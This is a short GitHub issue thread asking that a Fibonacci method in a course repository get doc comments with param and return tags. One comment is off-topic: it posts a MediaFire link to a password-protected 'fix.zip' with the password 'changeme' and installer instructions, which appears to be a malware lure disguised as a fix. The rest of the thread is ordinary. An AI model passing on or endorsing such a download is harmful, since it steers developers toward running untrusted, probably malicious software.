### ISSUE TITLE
Fibonacci Method should include doc comments.

### ISSUE THREAD

**Issue by mdiaz007** [mdiaz007/CEN4802C#1]
The Fibonacci method needs to include doc comments; at a minimum, the doc comments must include text describing the method's purpose along with param and return tags.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdiaz007** [comment]
Method does not return anything therefore return tag can be ommited.
